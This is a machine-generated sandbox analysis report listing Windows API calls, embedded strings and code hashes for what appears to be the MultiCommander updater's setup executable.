• SendMessageW.USER32(?,0000004E,00000000,?), ref: 00C21310
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: MessageParentSendWindow$BrowseFolderFromH_prolog3ListMallocPath
• String ID:
• API String ID: 1481806134-0
• Opcode ID: f9449ce11293d5a9641a4745ce76c524f02fce28f7b3da358cfba657abf29e1e
• Instruction ID: c9ad904e830f98c8cc56de9b3034704747a88b2f3777f6e63c17982197b35786
• Opcode Fuzzy Hash: f9449ce11293d5a9641a4745ce76c524f02fce28f7b3da358cfba657abf29e1e
• Instruction Fuzzy Hash: 6F41C471910225AFDB15ABA0DC59ABEB779BF14310F090118F812E75E1DF70DE00EBA0

APIs
• __EH_prolog3_GS.LIBCMT ref: 00C1129E
• GetKeyState.USER32(00000011), ref: 00C112A7
• GetObjectW.GDI32(?,0000005C,?), ref: 00C112D2
• CreateFontIndirectW.GDI32(?), ref: 00C11314
• GetSystemMetrics.USER32(00000006), ref: 00C11395
• GetSystemMetrics.USER32(00000003), ref: 00C1139B
• GetClientRect.USER32(?,?), ref: 00C113AD
• PtInRect.USER32(?,?,?), ref: 00C113D3
• PostMessageW.USER32(?,-00000115,00000000,00000000), ref: 00C113F5
• PostMessageW.USER32(?,-00000115,00000001,00000000), ref: 00C1140E
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: MessageMetricsPostRectSystem$ClientCreateFontH_prolog3_IndirectObjectState
• String ID:
• API String ID: 488872601-0
• Opcode ID: 6a55fe7df81e685f1ca8516099a77476d4dc05730deaab674ea786d960a5cac5
• Instruction ID: 88e7fade76388fd9618119125f8455edbb5d9f7ed9e9618a19dd80b4b00063ba
• Opcode Fuzzy Hash: 6a55fe7df81e685f1ca8516099a77476d4dc05730deaab674ea786d960a5cac5
• Instruction Fuzzy Hash: 4B41E431E002199BCF209FA4CD49BED3779BF0A714F288169FA25E70D1DB789984AF50

APIs
• __EH_prolog3_GS.LIBCMT ref: 00C1851E
• _strlen.LIBCMT ref: 00C1855E
• _strlen.LIBCMT ref: 00C185AC
• _strlen.LIBCMT ref: 00C185F9
• _strlen.LIBCMT ref: 00C18645
  • Part of subcall function 00C03869: MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,?,?), ref: 00C0388C
  • Part of subcall function 00C268FA: __EH_prolog3_GS.LIBCMT ref: 00C26901
  • Part of subcall function 00C268FA: lstrlenA.KERNEL32(00000000), ref: 00C2698B
  • Part of subcall function 00C268FA: lstrlenA.KERNEL32(00000007,00000007), ref: 00C2699E
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: _strlen$H_prolog3_lstrlen$ByteCharMultiWide
• String ID: $Failed to open xml file %s$Set "%s" = "%s"
• API String ID: 2761301357-3046045696
• Opcode ID: 2471efe8cba4a8348e9c30f2bb44ec5567e699f2f1c03d2509257bd9779e988e
• Instruction ID: ca33fc14d0ad282030bc23848ff3724a63fa69c3b5ef6eb4b1d8fca75ee0d9cc
• Opcode Fuzzy Hash: 2471efe8cba4a8348e9c30f2bb44ec5567e699f2f1c03d2509257bd9779e988e
• Instruction Fuzzy Hash: C4818C71A04254DFDB20EBA4CC85ADEB779AF06310F1441A9F415AB1D2DF309F89EBA1

APIs
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00C2BC17
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C2BC4A
• GetFileType.KERNEL32(00000000), ref: 00C2BC71
• SetFileTime.KERNEL32(00000000,?,?,?), ref: 00C2BC98
• CloseHandle.KERNEL32(00000000), ref: 00C2BC9F
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: File$CloseCreateHandleTimeTypeWrite
• String ID: ../$..\$:
• API String ID: 3781839213-2303759622
• Opcode ID: 8781b41147661d68c6830fbf74e038b3118bb04e0d4ec2c41b2ddb226453fdb9
• Instruction ID: 8192222b53dd0f13c385cd2eec62a0fed95fbef059e44a785e2f4fc57a5e0f25
• Opcode Fuzzy Hash: 8781b41147661d68c6830fbf74e038b3118bb04e0d4ec2c41b2ddb226453fdb9
• Instruction Fuzzy Hash: 55610571A002399BCB24EB24EC85BEEB3B4BF44310F1005A9F625A7591DF70AF85DB50

APIs
• LoadLibraryW.KERNEL32(Comctl32.dll,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 00C2CEC5
  • Part of subcall function 00C2CC8B: GetProcAddress.KERNEL32(00000000,00C34B26), ref: 00C2CCB9
• GetModuleFileNameW.KERNEL32(?,?,00000105,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CDDF
• SetLastError.KERNEL32(0000006F,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CDF3
• GetLastError.KERNEL32(00000020), ref: 00C2CE4A
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
• String ID: $@$Comctl32.dll$GetModuleHandleExW
• API String ID: 3640817601-4183358198
• Opcode ID: 89f17c77ea8fb11450a9469720abe4562e9b2181c6efcaa67443790559d92358
• Instruction ID: 5b6895aa1a7e6405ee08d964088a7519b855c50745095377c7704dda25a3ffc4
• Opcode Fuzzy Hash: 89f17c77ea8fb11450a9469720abe4562e9b2181c6efcaa67443790559d92358
• Instruction Fuzzy Hash: B3419171940238AADB309B68ECCDBAE76BCEB45710F1102A6F519E25E0DB749F85CF50

APIs
• __EH_prolog3.LIBCMT ref: 00C1B226
• RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C1B2C3
• RegCloseKey.ADVAPI32(?), ref: 00C1B2D5
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,0000006F,0000001C), ref: 00C1B381
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Close$CreateH_prolog3
• String ID: ForceIEUserAgent$ForceXPEdition$GetUnstableBeta$Software\%s\MultiUpdate
• API String ID: 2337491860-2948741853
• Opcode ID: 3c9289d293848b34e43f76e23b874ba8d99e3c203512000e090eac5fc7bdb205
• Instruction ID: bc1c97faa0ec3f292d868f1103b5dd58888a8c7f507b805e412a47bfed89865f
• Opcode Fuzzy Hash: 3c9289d293848b34e43f76e23b874ba8d99e3c203512000e090eac5fc7bdb205
• Instruction Fuzzy Hash: D4419E30D0021ADEEF10DBA0CC85EFEBB78FF19740F140429E811B6092EB715A99EB21
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00C2FAE0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C2FAF0
                                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00C2FAF9
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,00000000), ref: 00C2FB07
                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C2FB2F
                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Pointer$AddressDecodeDirectoryEncodeHandleModuleProcSystem
• String ID: SetDefaultDllDirectories$\$kernel32.dll
• API String ID: 2101061299-3881611067
APIs
• GetStockObject.GDI32(00000011), ref: 00C414D7
• GetStockObject.GDI32(0000000D), ref: 00C414E3
• GetObjectW.GDI32(00000000,0000005C,?), ref: 00C414F4
• GetDC.USER32(00000000), ref: 00C41503
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4151A
• MulDiv.KERNEL32(?,00000048,00000000), ref: 00C41526
• ReleaseDC.USER32(00000000,00000000), ref: 00C41532
Similarity
• API ID: Object$Stock$CapsDeviceRelease
• String ID: System
• API String ID: 46613423-3470857405
APIs
• __EH_prolog3.LIBCMT ref: 00C0FE1F
• LoadCursorW.USER32(00000000,00007F89), ref: 00C0FE3F
• GetWindowsDirectoryW.KERNEL32(00000000,00000104,00000104), ref: 00C0FE6A
• LoadLibraryW.KERNEL32(?,\winhlp32.exe,00000000,000000FF), ref: 00C0FE94
• LoadCursorW.USER32(00000000,0000006A), ref: 00C0FEA4
• CopyIcon.USER32(00000000), ref: 00C0FEAF
• FreeLibrary.KERNEL32(?), ref: 00C0FEBE
Similarity
• API ID: Load$CursorLibrary$CopyDirectoryFreeH_prolog3IconWindows
• String ID: \winhlp32.exe
• API String ID: 1689740230-695620452
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C21818
  • Part of subcall function 00C35225: __EH_prolog3.LIBCMT ref: 00C3522C
  • Part of subcall function 00C35225: GetWindowTextLengthW.USER32(?), ref: 00C3523C
  • Part of subcall function 00C35281: __EH_prolog3.LIBCMT ref: 00C35288
  • Part of subcall function 00C35281: GetWindowTextW.USER32(?,?,?), ref: 00C3529F
• CharNextW.USER32(?), ref: 00C218B5
• CharNextW.USER32(00000000), ref: 00C218F0
• CharPrevW.USER32(00000000,00000000), ref: 00C2190D
• CharPrevW.USER32(00000000,00000000), ref: 00C21922
• CharNextW.USER32(?), ref: 00C21B2F
• CharNextW.USER32(00000000), ref: 00C21B5A
• CharPrevW.USER32(00000000,00000000), ref: 00C21B77
• CharPrevW.USER32(00000000,00000000), ref: 00C21B8C
Similarity
• API ID: Char$NextPrev$H_prolog3TextWindow$H_prolog3_Length
• String ID:
• API String ID: 2364446717-0
APIs
• __EH_prolog3.LIBCMT ref: 00C46967
• SendMessageW.USER32(?,00000469,00000000,?), ref: 00C46A69
• SendMessageW.USER32(?,0000046A,?,00000000), ref: 00C46A7D
• SendMessageW.USER32(?,00000468,?,00000000), ref: 00C46A8E
• SendMessageW.USER32(?,00000470,00000000,00000000), ref: 00C46ACE
• SendMessageW.USER32(?,0000046F,00000000,00000000), ref: 00C46B17
• SendMessageW.USER32(?,00000473,00000000,00000001), ref: 00C46B3D
• SendMessageW.USER32(?,0000046F,00000000), ref: 00C46BC0
• SendMessageW.USER32(?,00000473,00000000), ref: 00C46C06
Similarity
• API ID: MessageSend$H_prolog3
• String ID:
• API String ID: 1885053084-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C302F0
• SendMessageW.USER32(?,00000000,00000000,00000080), ref: 00C30337
• SendMessageW.USER32(?,00000000,00000000,?), ref: 00C30363
• ValidateRect.USER32(?,00000000), ref: 00C30376
  • Part of subcall function 00C3F53C: GetClientRect.USER32(?,?), ref: 00C3F5A0
• GetClientRect.USER32(?,?), ref: 00C303E7
• BeginPaint.USER32(?,?), ref: 00C303F4
• SendMessageW.USER32(?,00000000,00000000,?), ref: 00C3042A
• SendMessageW.USER32(?,00000000,00000000), ref: 00C3044C
• EndPaint.USER32(?,?), ref: 00C30464
Similarity
• API ID: MessageSend$Rect$ClientPaint$BeginH_prolog3_Validate
• String ID:
• API String ID: 3883544035-0
Similarity
• API ID:
• String ID:
• API String ID: 0-3907804496
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 00C3112D
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 00C31162
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 00C3118A
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00C31216
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$ClientHandleModuleScreen
                                                                                                                          • String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
                                                                                                                          • API String ID: 471820996-2905070798
                                                                                                                          • Opcode ID: ac37991b42577f1f9443d7ea97ada269b96c8a1dbb5fa93a53a5e0242df804c9
                                                                                                                          • Instruction ID: 9ec1b4336de3f479a17f2d4da948b15bd82ecc4fcf853f391405b6391710f6f1
                                                                                                                          • Opcode Fuzzy Hash: ac37991b42577f1f9443d7ea97ada269b96c8a1dbb5fa93a53a5e0242df804c9
                                                                                                                          • Instruction Fuzzy Hash: 1881AB74610616EFCB15DF69E988AADBBB5FF08350B044169E81693B60DB72EE10DF80
                                                                                                                          APIs
                                                                                                                          • CheckMenuItem.USER32(?,?,00000400), ref: 00C37B96
                                                                                                                            • Part of subcall function 00C3D4F6: GetWindowTextW.USER32(?,?,00000100), ref: 00C3D554
                                                                                                                            • Part of subcall function 00C3D4F6: lstrcmpW.KERNEL32(?,00000001), ref: 00C3D566
                                                                                                                            • Part of subcall function 00C3D4F6: SetWindowTextW.USER32(?,00000001), ref: 00C3D572
                                                                                                                          • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 00C37BB1
                                                                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00C37BCE
                                                                                                                          • SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00000000), ref: 00C37C3B
                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C37C8B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfolstrcmp
                                                                                                                          • String ID: 0$@
                                                                                                                          • API String ID: 72408025-1545510068
                                                                                                                          • Opcode ID: 1a907b0f63213bc0610ce97f1b23001f3b4bcb84e62e711204e3a686f6d3ccb7
                                                                                                                          • Instruction ID: bfb57c661df9524489b6c20df9795be2ad3c0256b8790e0c447240763db982b0
                                                                                                                          • Opcode Fuzzy Hash: 1a907b0f63213bc0610ce97f1b23001f3b4bcb84e62e711204e3a686f6d3ccb7
                                                                                                                          • Instruction Fuzzy Hash: 5941DCB1624214AFCB349F65EC08FAABBB9FF44340F108229F91A9B591C770ED41CB90
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C16060
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00C160B2
                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00C16136
                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C16157
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesCreateDirectoryFileH_prolog3_PathTemp
                                                                                                                          • String ID: Failed to create temp folder...$MUTemp$Temp folder is not a folder. Aborting...
                                                                                                                          • API String ID: 1902444491-3648179290
                                                                                                                          • Opcode ID: debd15f5e2b8917fbe8b3e4f42dd4b3263692b4250b600eae2dcf9475a810131
                                                                                                                          • Instruction ID: 62556b7cc55562e54dcfa9a9e767e7959e235c26f05f7cf639a207161fd92398
                                                                                                                          • Opcode Fuzzy Hash: debd15f5e2b8917fbe8b3e4f42dd4b3263692b4250b600eae2dcf9475a810131
                                                                                                                          • Instruction Fuzzy Hash: 3B4151B1910128AADF20AB60DC9DAEE73B8AF15744F1401E9F409E6191DB349F84EFA1
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17C76
                                                                                                                          • _strlen.LIBCMT ref: 00C17C93
                                                                                                                          • _strlen.LIBCMT ref: 00C17CD6
                                                                                                                          • GetFileAttributesW.KERNEL32(0000003C,00000000,00000000,0000003C,00C170E9,?,?), ref: 00C17D1A
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00C17D3B
                                                                                                                            • Part of subcall function 00C03869: MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,?,?), ref: 00C0388C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File_strlen$AttributesByteCharH_prolog3_MoveMultiWide
                                                                                                                          • String ID: FAILED to Renamed file : "%s" => "%s"$Renamed file : "%s" => "%s"
                                                                                                                          • API String ID: 3337506382-2758536607
                                                                                                                          • Opcode ID: a456473090025592335b40dbf64f71c7b8a233e4697db4ceae803c3a688ba63a
                                                                                                                          • Instruction ID: 2ba86b59aaedc9fdb3dbbc506e47352cc37c384fb67ee241a9c7b66248ec8f3c
                                                                                                                          • Opcode Fuzzy Hash: a456473090025592335b40dbf64f71c7b8a233e4697db4ceae803c3a688ba63a
                                                                                                                          • Instruction Fuzzy Hash: 1F316B72E04208DFCB10EBA5D8559DEBBB8FF49710F144226F411BB191DB309E86EBA1
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_
                                                                                                                          • String ID: Error : %s$Failed to download %s (HTTP Status code : %d)$Failed to download %s (Operation : %d, Error code %d)$MultiCommander$MultiUpdate$Version information
                                                                                                                          • API String ID: 2427045233-607879564
                                                                                                                          • Opcode ID: c8642f1fc4ef75467dbc43d468081dd918a167aeb949b908a27a101691ddedc1
                                                                                                                          • Instruction ID: 8079b2da1bb9ded2a289c7b889bde5787c2763738f9c51f45005a8a9e998acce
                                                                                                                          • Opcode Fuzzy Hash: c8642f1fc4ef75467dbc43d468081dd918a167aeb949b908a27a101691ddedc1
                                                                                                                          • Instruction Fuzzy Hash: B821D2B1A00114ABDB14AAA5CC95CFE76A8EF16310F488069FC25E7192DB34DE85F761
                                                                                                                          APIs
                                                                                                                          • OutputDebugStringW.KERNEL32(raising exception,00CB94E0,00000020,00C1FE20,?), ref: 00C1ED8D
                                                                                                                          • RaiseException.KERNEL32(80000003,00000000,00000000,00000000), ref: 00C1ED9B
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C1EDC5
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,?,00000000,?), ref: 00C1EE43
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 00C1EE4A
                                                                                                                          • MiniDumpWriteDump.DBGHELP(00000000,?,00000000,?,00000000,?), ref: 00C1EE51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$DumpProcess$DebugExceptionMiniOutputRaiseStringThreadWrite
                                                                                                                          • String ID: raising exception
                                                                                                                          • API String ID: 4056924314-2279324606
                                                                                                                          • Opcode ID: f0294a367da0ab187ed7cd71085dda10de50b8fef53f0fabe91b007ae7f7fd20
                                                                                                                          • Instruction ID: 69b6e5e503d9dfd6aedaa16d0743ad89b5a43d01d86649476b0f7b235579a33d
                                                                                                                          • Opcode Fuzzy Hash: f0294a367da0ab187ed7cd71085dda10de50b8fef53f0fabe91b007ae7f7fd20
                                                                                                                          • Instruction Fuzzy Hash: D22186B1A002199FDF148FA9999CAFD7AB4FF06754F10012EED11E7290C7318E40EB65
                                                                                                                          APIs
